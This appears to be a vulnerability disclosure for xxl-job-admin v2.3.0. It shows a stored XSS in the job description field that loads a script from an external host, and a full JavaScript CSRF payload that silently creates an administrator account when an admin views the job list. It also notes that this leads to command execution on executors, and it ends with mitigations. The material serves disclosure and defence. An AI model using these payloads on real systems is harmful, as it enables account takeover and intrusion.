Version and Deployment
Product Version
xxl-job-admin v2.3.0
Deployment
mkdir -p /tmp/xxl-job
docker run -d -e PARAMS="--spring.datasource.url=jdbc:mysql://{MYSQL_IP}:{MYSQL_PORT}/xxl_job?useUnicode=true&characterEncoding=UTF-8&autoReconnect=true&serverTimezone=UTC --spring.datasource.username={MYSQL_USER} --spring.datasource.password={MYSQL_PASSWD} --spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver" -p {XXL-JOB-ADMIN_SERVICE_PORT}:8080 -v /tmp/xxl-job:/data/applogs --name xxl-job xuxueli/xxl-job-admin:2.3.0
Replace {MYSQL_IP}, {MYSQL_PORT}, {MYSQL_USER}, {MYSQL_PASSWD} and {XXL-JOB-ADMIN_SERVICE_PORT} with the actual values, then import https://github.com/xuxueli/xxl-job/blob/master/doc/db/tables_xxl_job.sql into MySQL to create the schema.
Stored XSS
There are two users in this example: admin (administrator) and tari (a normal user with only the default executor permission).
Log in as tari and go to http://127.0.0.1:8089/xxl-job-admin/jobinfo ([任务管理] Job Management) > the [操作] (Operations) dropdown > [编辑] (Edit).
Enter the XSS payload in the [任务描述] (Job Description) field:
<script src="http://tari.local:8888/payload1.js"/>
The content of payload1.js is:
alert(2)
Click [保存] (Save). The request that is actually sent goes to the http://127.0.0.1:8089/xxl-job-admin/jobinfo/update API endpoint, which stores the description without encoding it.
The stored XSS fires whenever an administrator opens http://127.0.0.1:8089/xxl-job-admin/jobinfo, where the job description is rendered into the page.
Use CSRF to Bypass HttpOnly
HttpOnly is set on the session cookie of this site, so the injected script cannot read the administrator's cookie directly.
Looking at the HTTP request, there is no CSRF token field, so the user/add endpoint accepts any request that carries a valid session cookie.
We therefore do not need the cookie value at all: the script runs in the administrator's browser on the application's own origin, so any request it issues is sent with the session cookie attached automatically. Modify payload1.js as follows:
const xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
  // readyState 4 means the request has completed (the response is ignored).
  if (this.readyState === 4) {
    console.log('pwn')
  }
};
// Synchronous POST to the user-creation endpoint of xxl-job-admin.
xhr.open("POST", "http://127.0.0.1:8089/xxl-job-admin/user/add", false);
// Send cookies with the request; same-origin requests carry them anyway, this also covers a cross-origin origin.
xhr.withCredentials = true;
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
// role=1 creates an administrator account; permission is left empty.
const params = "username=bypass&password=bypass&role=1&permission=";
xhr.send(params);
The next time an administrator opens http://127.0.0.1:8089/xxl-job-admin/jobinfo, the script runs in their session and we obtain an administrator account with the credentials bypass/bypass.
Other XSS Output Location
http://127.0.0.1:8089/xxl-job-admin/jobinfo ([任务管理] Job Management) > the [操作] (Operations) dropdown > [查询日志] (Query Log)
The job description is also rendered on this page, so the same payload triggers here too.
Further Thoughts on Exploitation
xxl-job is a distributed task scheduling platform. With administrator privileges we can create and run jobs, which means arbitrary command execution on the executors the admin instance manages.
Mitigation
- Validate user-supplied input to the /xxl-job-admin/jobinfo/update API so that HTML markup in the job description is rejected or stripped.
- HTML-entity encode data returned by the backend API before rendering it, to prevent XSS.
- Use a CSRF token on state-changing requests such as /xxl-job-admin/user/add to prevent CSRF. Note that a CSRF token alone does not stop the chain shown above, because script already running on the origin can read the token from the page; output encoding is the primary fix and the token is defence in depth.